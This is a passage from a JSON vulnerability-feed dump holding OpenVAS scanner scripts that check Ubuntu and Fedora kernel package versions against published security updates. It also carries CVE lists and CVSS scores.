ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-generic\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-server\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-virtual\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-386\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-generic\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-server\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-28-virtual\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-openvz\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-rt\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-28-xen\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-28\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"socket-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-386-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.24-28-generic-di\", ver:\"2.6.24-28.80\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-17T11:05:24", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2010-12-28T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2010-18983", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2010-4073", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-4082", "CVE-2010-4169", "CVE-2010-2963", "CVE-2010-4158", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-2071", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-3880", "CVE-2010-3874", "CVE-2010-4249", "CVE-2010-4157", "CVE-2010-3081", "CVE-2010-3067", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3079", "CVE-2010-3301"], "modified": "2018-01-16T00:00:00", "id": "OPENVAS:1361412562310862749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2010-18983\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 13\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-December/052513.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862749\");\n script_version(\"$Revision: 8438 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-16 18:38:23 +0100 (Tue, 16 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-28 07:11:56 +0100 (Tue, 28 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-18983\");\n script_cve_id(\"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-3874\", \"CVE-2010-4162\", \"CVE-2010-4249\", \"CVE-2010-2962\", \"CVE-2010-2963\", \"CVE-2010-3698\", \"CVE-2010-3705\", \"CVE-2010-3442\", \"CVE-2010-4258\", \"CVE-2010-4169\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-4082\", \"CVE-2010-3904\", \"CVE-2010-3432\", \"CVE-2010-3079\", \"CVE-2010-3080\", \"CVE-2010-3081\", \"CVE-2010-3301\", \"CVE-2010-3067\", \"CVE-2010-2960\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2524\", \"CVE-2010-2478\", \"CVE-2010-2071\");\n script_name(\"Fedora Update for kernel FEDORA-2010-18983\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.34.7~66.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-08-01T16:17:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-08T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-15241", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-1083", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2010-3698", "CVE-2011-1161", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-3353", "CVE-2011-2905", "CVE-2011-4077", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-4081", "CVE-2011-3191"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863606", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863606", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-15241\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/068760.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863606\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-08 19:07:44 +0530 (Tue, 08 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-15241\");\n script_cve_id(\"CVE-2011-4081\", \"CVE-2011-4077\", \"CVE-2011-1083\", \"CVE-2011-2699\",\n \"CVE-2011-1161\", \"CVE-2011-3353\", \"CVE-2011-2918\", \"CVE-2011-3188\",\n \"CVE-2011-2723\", \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\",\n \"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\",\n \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\",\n \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\",\n \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\",\n \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-15241\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~103.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:56", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-11-08T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-15241", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-1083", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2010-3698", "CVE-2011-1161", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-3353", "CVE-2011-2905", "CVE-2011-4077", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-4081", "CVE-2011-3191"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863606", "href": "http://plugins.openvas.org/nasl.php?oid=863606", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-15241\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/068760.html\");\n script_id(863606);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-08 19:07:44 +0530 (Tue, 08 Nov 2011)\");\n script_tag(name:\"cvss_base\", 